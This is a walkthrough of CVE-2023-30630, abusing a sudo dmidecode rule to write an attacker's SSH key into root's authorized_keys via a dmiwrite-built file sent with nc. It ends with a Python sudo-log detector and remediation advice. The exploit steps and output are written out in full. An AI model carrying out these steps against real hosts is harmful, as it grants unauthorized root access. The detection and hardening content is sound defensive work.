# Dmidecode - CVE-2023-30630

Dmidecode is a tool for dumping a computer's DMI (SMBIOS) table contents in a human-readable format. This table contains a description of the system's hardware components, as well as other useful pieces of information such as serial numbers and BIOS revisions.

When a low-privileged user is allowed to run dmidecode with root permissions, the application can be used maliciously to escalate privileges to root through a file-write vulnerability. The tool dmiwrite is used to build the malicious payload.
## Find privesc vector on victim host
```
[user@victimHost index]$ sudo -l
User user may run the following commands on victimHost:
    (root) NOPASSWD: /usr/sbin/dmidecode
```
## Verify dmidecode version
```
[user@victimHost ~]$ /usr/sbin/dmidecode -V
3.2
```
## Create payload on the local attack machine

Note that the first line of the written file will be destroyed (overwritten with random characters), so the correct payload needs to be on line 2 or below.

```
➜ cat authorized_keys
ssh-rsa nothing
ssh-rsa AAAAB3NzaC...[SNIP]
```
## Build payload with dmiwrite
```
➜ ./dmiwrite authorized_keys authorized_keys.dmi
Wrote payload of length 741 to authorized_keys.dmi
Padding 982301 bytes to authorized_keys.dmi
Setting checksum: memset(buf+30, 130, 1);
Wrote DMI header of length 32 to authorized_keys.dmi
Padding 65536 bytes to authorized_keys.dmi
Congratulations, authorized_keys.dmi looks like a valid DMI file.
```
## Upload file to victim
```
➜ nc -w3 victimHost 4488 < authorized_keys.dmi
[user@victimHost tmp]$ nc -lvp 4488 > authorized_keys.dmi
```
## Write file
```
[user@victimHost tmp]$ sudo /usr/sbin/dmidecode -d authorized_keys.dmi --no-sysfs --dump-bin /root/.ssh/authorized_keys
# dmidecode 3.2
Scanning authorized_keys.dmi for entry point.
SMBIOS 2.1 present.
1 structures occupying 741 bytes.
Table at 0x00000000.
# Writing 741 bytes to /root/.ssh/authorized_keys.
# Writing 0 bytes to /root/.ssh/authorized_keys.
/root/.ssh/authorized_keys: fwrite: No such file or directory
```
## Login as root
```
dmiwrite-master ➜ ssh root@victimHost -i victim-id_rsa
[root@victimHost ~]# id
uid=0(root) gid=0(root) groups=0(root)
```
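## Detecting this on the defender side

As an added example that is not part of the original page, the Python script below scans sudo log lines for the pattern shown above: dmidecode run as root with `--dump-bin`, and rated high when it is combined with `-d`/`--dev-mem`/`--from-dump` (so the "table" being written comes from a caller-supplied file) or when the destination is a privileged path. The sample log lines and the sensitive-path list are constructed assumptions for the example.

```python
import re
import shlex

# Constructed sample sudo log lines (syslog style) for this example; not from any real host.
SAMPLE_LOG = """\
Jan 10 12:00:01 victimHost sudo:  user : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/usr/sbin/dmidecode -d authorized_keys.dmi --no-sysfs --dump-bin /root/.ssh/authorized_keys
Jan 10 12:00:05 victimHost sudo: admin : TTY=pts/1 ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/dmidecode -t system
Jan 10 12:00:09 victimHost sudo:   ops : TTY=pts/2 ; PWD=/tmp ; USER=root ; COMMAND=/usr/sbin/dmidecode --dump-bin /tmp/smbios.bin
"""

SUDO_RE = re.compile(r"sudo:\s+(?P<who>\S+) : .*?COMMAND=(?P<cmd>.+)$")
INPUT_OPTS = {"-d", "--dev-mem", "--from-dump"}  # dmidecode reads caller-supplied data, not the real SMBIOS table
SENSITIVE_PREFIXES = ("/root", "/etc", "/usr", "/var", "/boot")  # assumed list; tune per host


def parse_dmidecode(cmd):
    """Return (dump_dest, input_controlled) for a dmidecode command using --dump-bin, else None."""
    argv = shlex.split(cmd)
    if not argv or argv[0].rsplit("/", 1)[-1] != "dmidecode":
        return None
    dest, controlled = None, False
    i = 1
    while i < len(argv):
        arg = argv[i]
        if arg.startswith("--dump-bin="):
            dest = arg.split("=", 1)[1]
        elif arg == "--dump-bin" and i + 1 < len(argv):
            dest = argv[i + 1]
            i += 1
        elif arg.split("=", 1)[0] in INPUT_OPTS:
            controlled = True
            if "=" not in arg:
                i += 1  # skip the file operand of -d / --dev-mem / --from-dump
        i += 1
    return (dest, controlled) if dest else None


def severity(dest, controlled):
    # High when the table comes from a caller-supplied file or the target is a privileged path.
    sensitive = dest.startswith(SENSITIVE_PREFIXES) or "/.ssh/" in dest
    return "high" if controlled or sensitive else "medium"


def scan(log_text):
    """Return (user, destination, severity) for every sudo dmidecode --dump-bin invocation."""
    findings = []
    for line in log_text.splitlines():
        m = SUDO_RE.search(line)
        parsed = parse_dmidecode(m.group("cmd")) if m else None
        if parsed:
            findings.append((m.group("who"), parsed[0], severity(*parsed)))
    return findings
```

Any hit is worth a look, since a sudo rule that allows `/usr/sbin/dmidecode` with arbitrary arguments is the root cause here; restricting the rule to a fixed argument list without `--dump-bin` and updating dmidecode removes the write primitive.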